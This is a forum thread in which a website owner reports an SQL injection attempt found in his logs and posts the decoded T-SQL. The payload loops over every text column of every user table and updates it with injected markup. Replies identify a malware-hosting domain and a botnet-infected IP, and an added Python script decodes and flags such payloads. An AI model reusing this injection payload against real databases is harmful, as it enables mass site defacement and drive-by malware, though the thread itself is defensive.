Am I Being H4X0R3D?


I run a small niche site (nothing to do with Runescape or gaming).

Tonight, while looking at my logs, I noticed someone trying to reach a strange URL:

http://[my site url was here]/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C4152 ...

After decoding all that hex, I got this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=''">

PvP is not for me

In the 3rd Year of the Boycott
Real-world money saved since FT/W: Hundreds of Dollars
Real-world time saved since FT/W: Thousands of Hours
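
The log review and hex-decoding step described in the first post, as an added example that is not part of the original thread: it scans access-log lines for a `CAST(0x...)` blob in the request target, decodes it to readable SQL, and lists the keywords that make it suspicious. The log lines, the 192.0.2.x addresses, the dates and the function names are constructed for illustration; the sample payload reuses only the opening of the decoded statement quoted above.

```python
import re
from urllib.parse import unquote

# The CAST(0x<hex> ...) wrapper seen in the logged URL, after URL-decoding.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9a-f]+)", re.IGNORECASE)
# Keywords worth flagging once the payload is readable (taken from the decoded SQL).
KEYWORDS = ("DECLARE", "EXEC", "CURSOR", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE")

def decode_cast_payloads(request_target):
    """Return the decoded text of every CAST(0x...) blob in a request target."""
    text = unquote(request_target)          # %20 -> space, %27 -> ' and so on
    decoded = []
    for match in CAST_HEX.finditer(text):
        blob = match.group(1)
        if len(blob) % 2:                   # truncated log line: drop the odd nibble
            blob = blob[:-1]
        # The page's payload is single-byte text (CHAR), so latin-1 never fails.
        decoded.append(bytes.fromhex(blob).decode("latin-1"))
    return decoded

def scan_log(lines):
    """Return (client_ip, decoded_payload, matched_keywords) per suspicious request."""
    hits = []
    for line in lines:
        parts = line.split('"')             # combined log format: ip ... "request" ...
        if len(parts) < 3:
            continue
        request = parts[1].split()          # METHOD, target, protocol
        if len(request) < 2:
            continue
        for payload in decode_cast_payloads(request[1]):
            found = [k for k in KEYWORDS if k in payload.upper()]
            hits.append((line.split()[0], payload, found))
    return hits

# Constructed sample data: opening of the decoded statement, re-encoded as hex.
SAMPLE_SQL = "DECLARE @T varchar(255),@C varchar(4000)"
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:00 +0000] "GET /?%27;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x' + SAMPLE_SQL.encode().hex().upper()
    + '%20AS%20CHAR(4000)) HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2000:00:00:05 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, payload, found in scan_log(SAMPLE_LOG):
        print(ip, found, payload)
```
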

From what I can see, and the fact I'm an amateur, I'd daresay it's a keylogger, an injection attack, a tracker, or a rootkit. Try not to go to the website in the hex, I can't guarantee it's a clean link.

I was going to eat hot dogs for dinner tonight. I think I will settle for cereal.

 

OPEN WIDE HERE COMES THE HELICOPTER.

http://www.siteadvisor.com/sites/douhunqn.cn

Check the comment on the bottom. ultimania92 was right on almost all counts there lol, that site (and all the ones it links to apparently) has links to browser exploits. Just google search douhunqn.cn, the results pretty much confirm what the SiteAdvisor site said.

[hide=Funny Quotes]

So you sucker punched a kid in the back of the head? Good job.
What scares me is that you're like 10 years old.
-.- im not that freaking young
You were a couple years ago.
It's not racist if its true.
Hmm... I wonder how one goes about throwing someone out a window in a mystic fashion :-k

 

The mental image for that is freaking awesome.

[/hide]

- I dont need to "get a life." I'm a gamer - I have LOTS of lives!

  • Author

Thanks for the info.

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

141.158.58.64

PvP is not for me

In the 3rd Year of the Boycott
Real-world money saved since FT/W: Hundreds of Dollars
Real-world time saved since FT/W: Thousands of Hours

[quote]
Thanks for the info.

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

141.158.58.64
[/quote]

That would be just about right, why he didn't hide his IP though is beyond me.

I was going to eat hot dogs for dinner tonight. I think I will settle for cereal.

 

OPEN WIDE HERE COMES THE HELICOPTER.

Well generally, people who are unknowingly infected and become a part of a botnet don't try to hide their IP.

These people are usually the ones who don't know what botnets are and leave their computer open to them in the first place.

[quote]
Thanks for the info.

The IP in question traces back to the Philadelphia area. Makes me think someone's computer is infected by a botnet.

141.158.58.64
[/quote]

You're right on, lordkafei. It is a person who didn't properly protect their PC, and is currently an unknowing host to a bot on their system. Further info is at the link below...

http://network-tools.com/default.asp?prog=express&host=141.158.58.64

(Note: I don't provide bad links. It is clean, so go have a look!)

I suggest that you note the date and time of when the attack occurred, and get in touch with Verizon in Philadelphia. They will be able to put an end to this problem, forever. :ugeek:

~Mr. D. V. Devnull

tifuserbar-dsavi_x4.jpg and normally with a cool mind.

(Warning: This user can be VERY confusing to some people... And talks in 3rd person for the timebeing due to how insane they are... Sometimes even to themself.)
